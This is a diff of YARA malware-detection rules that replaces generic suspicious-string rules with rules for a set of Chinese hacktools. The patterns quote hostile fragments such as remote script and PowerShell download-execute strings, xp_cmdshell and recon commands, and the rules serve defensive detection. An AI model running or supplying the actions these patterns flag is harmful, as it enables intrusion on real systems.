+		$s0 = "\\Device\\devIdtTool" wide
+		$s1 = "IoDeleteSymbolicLink" fullword ascii
+		$s3 = "IoDeleteDevice" fullword ascii
+		$s6 = "IoCreateSymbolicLink" fullword ascii
+		$s7 = "IoCreateDevice" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 7KB and all of them
 }
-rule SIGNATURE_BASE_Suspicious_Script_Running_From_HTTP
+rule SIGNATURE_BASE_Hkmjjiis6 : FILE
 {
 	meta:
-		description = "Detects a suspicious "
+		description = "Chinese Hacktool Set - file hkmjjiis6.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9ba84e9c-a32b-5f66-8d50-75344599cafc"
-		date = "2017-08-20"
-		modified = "2025-03-21"
-		reference = "https://www.hybrid-analysis.com/sample/a112274e109c5819d54aa8de89b0e707b243f4929a83e77439e3ff01ed218a35?environmentId=100"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L48-L64"
+		id = "9618c6ec-1557-5b1b-bebc-1c220bb3aba4"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1337-L1358"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "49ead238b9153886ddbcfe37939628fd848283373e2807797d0849559ebecf6c"
-		score = 50
+		hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7"
+		logic_hash = "4ea95b7a5bd24e0dfdcef045d101b7f15e18b20f1328901bb340d9aaad336981"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "cmd /C script:http://" ascii nocase
-		$s2 = "cmd /C script:https://" ascii nocase
-		$s3 = "cmd.exe /C script:http://" ascii nocase
-		$s4 = "cmd.exe /C script:https://" ascii nocase
+		$s1 = "comspec" fullword ascii
+		$s2 = "user32.dlly" ascii
+		$s3 = "runtime error" ascii
+		$s4 = "WinSta0\\Defau" ascii
+		$s5 = "AppIDFlags" fullword ascii
+		$s6 = "GetLag" fullword ascii
+		$s7 = "* FROM IIsWebInfo" ascii
+		$s8 = "wmiprvse.exe" ascii
+		$s9 = "LookupAcc" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 70KB and all of them
 }
-rule SIGNATURE_BASE_Reconcommands_In_File : FILE
+rule SIGNATURE_BASE_Dos_Lcx : FILE
 {
 	meta:
-		description = "Detects various recon commands in a single file"
+		description = "Chinese Hacktool Set - file lcx.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "62d59913-5dbd-512c-98ea-044bbb9ac2da"
-		date = "2017-12-11"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/haroonmeer/status/939099379834658817"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L66-L86"
+		id = "2f443673-bfed-5ce3-a0e6-6b59f27c9658"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1360-L1384"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "73b4bcf76f42a6bf9c3d9dfe3f4e754ce2856e03a47cfd35388d47290209e65d"
-		score = 40
+		hash = "b6ad5dd13592160d9f052bb47b0d6a87b80a406d"
+		logic_hash = "bbe215fb27825b4f4bbfa71808ac945f341efbc70a21f79689065982a843d7f1"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "tasklist"
-		$ = "net time"
-		$ = "systeminfo"
-		$ = "whoami"
-		$ = "nbtstat"
-		$ = "net start"
-		$ = "qprocess"
-		$ = "nslookup"
+		$s0 = "c:\\Users\\careful_snow\\" ascii
+		$s1 = "Desktop\\Htran\\Release\\Htran.pdb" ascii
+		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
+		$s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s6 = "=========== Code by lion & bkbll, Welcome to [url]http://www.cnhonker.com[/url] " ascii
+		$s7 = "[-] There is a error...Create a new connection." fullword ascii
+		$s8 = "[+] Accept a Client on port %d from %s" fullword ascii
+		$s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s13 = "[+] Make a Connection to %s:%d...." fullword ascii
+		$s16 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
+		$s17 = "[+] Waiting another Client on port:%d...." fullword ascii
+		$s18 = "[+] Accept a Client on port %d from %s ......" fullword ascii
 
 	condition:
-		filesize < 5KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
 }
-rule SIGNATURE_BASE_VBS_Dropper_Script_Dec17_1 : FILE
+rule SIGNATURE_BASE_X_Way2_5_X_Way : FILE
 {
 	meta:
-		description = "Detects a supicious VBS script that drops an executable"
+		description = "Chinese Hacktool Set - file X-way.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "60f23d32-0737-501f-bf1c-1ca32af62efc"
-		date = "2018-01-01"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L88-L107"
+		id = "8e878671-2a7c-5c6e-a905-05d303f42e0f"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1386-L1407"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f3c55bd6bf382891263887e46a794329c78bff87b7685088911261fc3b3b133d"
-		score = 80
+		hash = "8ba8530fbda3e8342e8d4feabbf98c66a322dac6"
+		logic_hash = "6261de5db1e7527f7726effe26ed5f88638e6cb378db4c99183dddcd42ae231f"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "TVpTAQEAAAAEAA"
-		$s2 = "TVoAAAAAAAAAAA"
-		$s3 = "TVqAAAEAAAAEAB"
-		$s4 = "TVpQAAIAAAAEAA"
-		$s5 = "TVqQAAMAAAAEAA"
-		$a1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
+		$s0 = "TTFTPSERVERFRM" fullword wide
+		$s1 = "TPORTSCANSETFRM" fullword wide
+		$s2 = "TIISSHELLFRM" fullword wide
+		$s3 = "TADVSCANSETFRM" fullword wide
+		$s4 = "ntwdblib.dll" fullword ascii
+		$s5 = "TSNIFFERFRM" fullword wide
+		$s6 = "TCRACKSETFRM" fullword wide
+		$s7 = "TCRACKFRM" fullword wide
+		$s8 = "dbnextrow" fullword ascii
 
 	condition:
-		filesize < 600KB and $a1 and 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them
 }
-rule SIGNATURE_BASE_SUSP_PDB_Strings_Keylogger_Backdoor : HIGHVOL FILE
+rule SIGNATURE_BASE_Tools_Sqlcmd : FILE
 {
 	meta:
-		description = "Detects PDB strings used in backdoors or keyloggers"
+		description = "Chinese Hacktool Set - file Sqlcmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "190daadb-0de6-5665-a241-95c374dbda47"
-		date = "2018-03-23"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L109-L130"
+		id = "26e29826-d4bb-55d0-9331-a91e4473daca"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1409-L1428"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9a842ff8cd8be98a2e37a81706a9c594e8bf1bcc6bd3cedfe4747cd52f6044f5"
-		score = 65
+		hash = "99d56476e539750c599f76391d717c51c4955a33"
+		logic_hash = "aa600f7c56d72d767e9ca51d8b1ee2b2c62302ea1afbed39e4670debd30c5247"
+		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "\\Release\\PrivilegeEscalation"
-		$ = "\\Release\\KeyLogger"
-		$ = "\\Debug\\PrivilegeEscalation"
-		$ = "\\Debug\\KeyLogger"
-		$ = "Backdoor\\KeyLogger_"
-		$ = "\\ShellCode\\Debug\\"
-		$ = "\\ShellCode\\Release\\"
-		$ = "\\New Backdoor"
+		$s0 = "[Usage]:  %s <HostName|IP> <UserName> <Password>" fullword ascii
+		$s1 = "=============By uhhuhy(Feb 18,2003) - http://www.cnhonker.net=============" fullword ascii
+		$s4 = "Cool! Connected to SQL server on %s successfully!" fullword ascii
+		$s5 = "EXEC master..xp_cmdshell \"%s\"" fullword ascii
+		$s6 = "=======================Sqlcmd v0.21 For HScan v1.20=======================" fullword ascii
+		$s10 = "Error,exit!" fullword ascii
+		$s11 = "Sqlcmd>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and 3 of them
 }
-rule SIGNATURE_BASE_SUSP_Microsoft_Copyright_String_Anomaly_2 : FILE
+rule SIGNATURE_BASE_Sword1_5 : FILE
 {
 	meta:
-		description = "Detects Floxif Malware"
+		description = "Chinese Hacktool Set - file Sword1.5.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3257aff0-b923-5e56-b67c-fa676341a102"
-		date = "2018-05-11"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L132-L146"
+		id = "dff8666a-0373-5605-9012-92b2b3ec71ea"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1430-L1449"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "60bc5d8d0853f474b81d2274a65977a12a481e4b669b38ae47a325eeb60d2735"
-		score = 60
+		hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"
+		logic_hash = "09e09f7ea16dc917388cbccb22a7abfed9b693a33d61698f0e838f029402c256"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085"
 
 	strings:
-		$s1 = "Microsoft(C) Windows(C) Operating System" fullword wide
+		$s3 = "http://www.ip138.com/ip2city.asp" fullword wide
+		$s4 = "http://www.md5decrypter.co.uk/feed/api.aspx?" fullword wide
+		$s6 = "ListBox_Command" fullword wide
+		$s13 = "md=7fef6171469e80d32c0559f88b377245&submit=MD5+Crack" fullword wide
+		$s18 = "\\Set.ini" wide
+		$s19 = "OpenFileDialog1" fullword wide
+		$s20 = " (*.txt)|*.txt" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 4 of them
 }
-rule SIGNATURE_BASE_SUSP_LNK_File_Appdata_Roaming : FILE
+rule SIGNATURE_BASE_Tools_Scan : FILE
 {
 	meta:
-		description = "Detects a suspicious link file that references to AppData Roaming"
+		description = "Chinese Hacktool Set - file scan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d905e58f-ae2e-5dc2-b206-d0435b023df0"
-		date = "2018-05-16"
-		modified = "2025-03-21"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L148-L168"
+		id = "4601d4d0-2b7e-5937-87b6-df80ab373752"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1451-L1466"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5e5c78d3fe3fcdbfb097f833fbb1e15ad1f79e63b330eaba754d8b5296b5165a"
-		score = 50
-		quality = 85
+		hash = "c580a0cc41997e840d2c0f83962e7f8b636a5a13"
+		logic_hash = "d8bf2e4a4634f74ce548a5824090502f2ccef382bdbcaf795df711e88a325912"
+		score = 75
+		quality = 81
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "AppData" fullword wide
-		$s3 = "Roaming" fullword wide
-		$s4 = { 00 2E 00 65 00 78 00 65 00 2E 00 43 00 3A 00 5C
-              00 55 00 73 00 65 00 72 00 73 00 5C }
+		$s2 = "Shanlu Studio" fullword wide
+		$s3 = "_AutoAttackMain" fullword ascii
+		$s4 = "_frmIpToAddr" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and ( filesize < 1KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_LNK_File_Pathtraversal : FILE
+rule SIGNATURE_BASE_Dos_C : FILE
 {
 	meta:
-		description = "Detects a suspicious link file that references a file multiple folders lower than the link itself"
+		description = "Chinese Hacktool Set - file c.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f4f6709f-9c4d-5f0c-9826-97444d282adc"
-		date = "2018-05-16"
-		modified = "2025-03-21"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L170-L186"
+		id = "2e8319de-fe54-5083-968c-4707d127f072"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1468-L1487"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9935c454518abe7fd4ec4f09e36e4200ec7c9f3b3ad004e9b49d60c08f508236"
-		score = 40
+		hash = "3deb6bd52fdac6d5a3e9a91c585d67820ab4df78"
+		logic_hash = "2865b50e6a323462fab39bd84571939c618cf6f00e147039f6e699ba4d195a00"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "..\\..\\..\\..\\..\\"
+		$s0 = "!Win32 .EXE." fullword ascii
+		$s1 = ".MPRESS1" fullword ascii
+		$s2 = ".MPRESS2" fullword ascii
+		$s3 = "XOLEHLP.dll" fullword ascii
+		$s4 = "</body></html>" fullword ascii
+		$s8 = "DtcGetTransactionManagerExA" fullword ascii
+		$s9 = "GetUserNameA" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and ( filesize < 1KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Script_Obfuscation_Char_Concat
+rule SIGNATURE_BASE_Arpsniffer : FILE
 {
 	meta:
-		description = "Detects strings found in sample from CN group repo leak in October 2018"
+		description = "Chinese Hacktool Set - file arpsniffer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6d3bfdfd-ef8f-5740-ac1f-5835c7ce0f43"
-		date = "2018-10-04"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/JaromirHorejsi/status/1047084277920411648"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L188-L200"
+		id = "78db3b18-008a-5a4e-9504-0cbe3b852046"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1489-L1506"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "28b648e0e1c22fefa49a937f40bd4ed09c5d3894ff059979bad69e8bc98fcac2"
-		score = 65
+		hash = "7d8753f56fc48413fc68102cff34b6583cb0066c"
+		logic_hash = "eb0a425be0fff87eb58689a4eee4b6729e8ee985e6224790111322d4b182caf1"
+		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\"c\" & \"r\" & \"i\" & \"p\" & \"t\"" ascii
+		$s1 = "SHELL" ascii
+		$s2 = "PacketSendPacket" fullword ascii
+		$s3 = "ArpSniff" ascii
+		$s4 = "pcap_loop" fullword ascii
+		$s5 = "packet.dll" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 120KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Powershell_IEX_Download_Combo
+rule SIGNATURE_BASE_Pw_Inspector_2 : FILE
 {
 	meta:
-		description = "Detects strings found in sample from CN group repo leak in October 2018"
+		description = "Chinese Hacktool Set - file pw-inspector.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1dfedcb0-345c-548c-85ac-3c1e78bfd9e2"
-		date = "2018-10-04"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/JaromirHorejsi/status/1047084277920411648"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L202-L218"
+		id = "795c7009-93a8-57c4-8554-f0ed5c1d50f8"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1508-L1524"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0a1507859354e0e0d9284befcf777c4d3883496eb96524a246a1df4f3a247aa9"
-		score = 65
+		hash = "e0a1117ee4a29bb4cf43e3a80fb9eaa63bb377bf"
+		logic_hash = "7d2021ff471f03deb9e6d8b62fcb218ae3198f21fd7b8fa1fdd9b96228b8c2f8"
+		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "IEX ((new-object net.webclient).download" ascii nocase
-		$fp1 = "chocolatey.org"
-		$fp2 = "Remote Desktop in the Appveyor"
-		$fp3 = "/appveyor/" ascii
+		$s1 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii
+		$s2 = "Syntax: %s [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p " ascii
+		$s3 = "PW-Inspector" fullword ascii
+		$s4 = "i:o:m:M:c:lunps" fullword ascii
 
 	condition:
-		$x1 and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
 }
-rule SIGNATURE_BASE_SUSP_Win32Dll_String : FILE
+rule SIGNATURE_BASE_Datpcshare : FILE
 {
 	meta:
-		description = "Detects suspicious string in executables"
+		description = "Chinese Hacktool Set - file datPcShare.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1c78386-c23d-5138-942a-3da90e5802cc"
-		date = "2018-10-24"
-		modified = "2025-03-21"
-		reference = "https://medium.com/@Sebdraven/apt-sidewinder-changes-theirs-ttps-to-install-their-backdoor-f92604a2739"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L220-L232"
+		id = "1bf44c0d-6aa7-5486-baee-c17d3e82403f"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1526-L1542"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "514596e078483920cedf0091cd769d8462acfd39956c3ed3e12d630b02ebb7cc"
-		score = 65
+		hash = "87acb649ab0d33c62e27ea83241caa43144fc1c4"
+		logic_hash = "15297a8019192371032fc11b966d1a89d951c176da6d64e80ca5a201f55341c0"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7bd7cec82ee98feed5872325c2f8fd9f0ea3a2f6cd0cd32bcbe27dbbfd0d7da1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "win32dll.dll" fullword ascii
+		$s1 = "PcShare.EXE" fullword wide
+		$s2 = "MZKERNEL32.DLL" fullword ascii
+		$s3 = "PcShare" fullword wide
+		$s4 = "QQ:4564405" fullword wide
 
 	condition:
-		filesize < 60KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Modified_Systemexefilename_In_File : FILE
+rule SIGNATURE_BASE_Tools_Xport : FILE
 {
 	meta:
-		description = "Detecst a variant of a system file name often used by attackers to cloak their activity"
+		description = "Chinese Hacktool Set - file xport.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "97d91e1b-49b8-504e-9e9c-6cfb7c2afe41"
-		date = "2018-12-11"
-		modified = "2025-03-21"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L234-L248"
+		id = "3223fe5b-6135-5530-a5eb-10c44f3f6277"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1544-L1565"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "45c01024c4e6a3563cd27d8a78e2236d49aa795d24f322774a14b4c7289830c4"
-		score = 65
+		hash = "9584de562e7f8185f721e94ee3cceac60db26dda"
+		logic_hash = "9eea73732643f74b4802af0672f5c3ab09cc54cfecd80f8903efc26b7ceaec29"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a"
-		hash2 = "f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "svchosts.exe" fullword wide
+		$s1 = "Match operate system failed, 0x%00004X:%u:%d(Window:TTL:DF)" fullword ascii
+		$s2 = "Example: xport www.xxx.com 80 -m syn" fullword ascii
+		$s3 = "%s - command line port scanner" fullword ascii
+		$s4 = "xport 192.168.1.1 1-1024 -t 200 -v" fullword ascii
+		$s5 = "Usage: xport <Host> <Ports Scope> [Options]" fullword ascii
+		$s6 = ".\\port.ini" fullword ascii
+		$s7 = "Port scan complete, total %d port, %d port is opened, use %d ms." fullword ascii
+		$s8 = "Code by glacier <glacier@xfocus.org>" fullword ascii
+		$s9 = "http://www.xfocus.org" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
 }
-rule SIGNATURE_BASE_SUSP_JAVA_Class_With_VBS_Content : FILE
+rule SIGNATURE_BASE_Pc_Xai : FILE
 {
 	meta:
-		description = "Detects a JAVA class file with strings known from VBS files"
-		author = "Florian Roth"
-		id = "472cbeaf-28e7-51a2-b2e6-96c1d9d05b26"
-		date = "2019-01-03"
-		modified = "2025-03-20"
-		reference = "https://www.menlosecurity.com/blog/a-jar-full-of-problems-for-financial-services-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L250-L275"
+		description = "Chinese Hacktool Set - file xai.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dcf1b57b-3616-5198-bd57-18505fee91ae"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1567-L1586"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bf325bbb6a448f977e4e661e4296c4145de9a809c79cee8538d660ecaff76e94"
-		score = 70
-		quality = 83
+		hash = "f285a59fd931ce137c08bd1f0dae858cc2486491"
+		logic_hash = "80659fcf1721b20f459ac0480401bdf643c95b46118d03320bc6d4e4ee4b67f7"
+		score = 75
+		quality = 60
 		tags = "FILE"
-		hash1 = "e0112efb63f2b2ac3706109a233963c19750b4df0058cc5b9d3fa1f1280071eb"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "java/lang/String" ascii
-		$s1 = ".vbs" ascii
-		$s2 = "createNewFile" fullword ascii
-		$s3 = "wscript" fullword ascii nocase
-		$fp1 = "com/smm/"
-		$fp2 = "install"
+		$s1 = "Powered by CoolDiyer @ C.Rufus Security Team 05/19/2008  http://www.xcodez.com/" fullword wide
+		$s2 = "%SystemRoot%\\System32\\" ascii
+		$s3 = "%APPDATA%\\" ascii
+		$s4 = "---- C.Rufus Security Team ----" fullword wide
+		$s5 = "www.snzzkz.com" fullword wide
+		$s6 = "%CommonProgramFiles%\\" ascii
+		$s7 = "GetRand.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and filesize < 100KB and $a1 and all of ( $s* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_RAR_With_PDF_Script_Obfuscation : FILE
+rule SIGNATURE_BASE_Radmin_Hash : FILE
 {
 	meta:
-		description = "Detects RAR file with suspicious .pdf extension prefix to trick users"
+		description = "Chinese Hacktool Set - file Radmin_Hash.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a3d2f5e9-3052-551b-8b2c-abcdd1ac2e48"
-		date = "2019-04-06"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L277-L293"
+		id = "07761e81-15b4-5639-b766-8dc3f16e2b7a"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1588-L1605"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "05e9fd7620a70a490548d4562c80497bcf888e493b8e1188e0a0e0c274e2a7e5"
-		score = 65
+		hash = "be407bd5bf5bcd51d38d1308e17a1731cd52f66b"
+		logic_hash = "d6ee13a2ed30bb44471593386521f67be0d6ccd6f8a0ebf8557012a099f81d3d"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "b629b46b009a1c2306178e289ad0a3d9689d4b45c3d16804599f23c90c6bca5b"
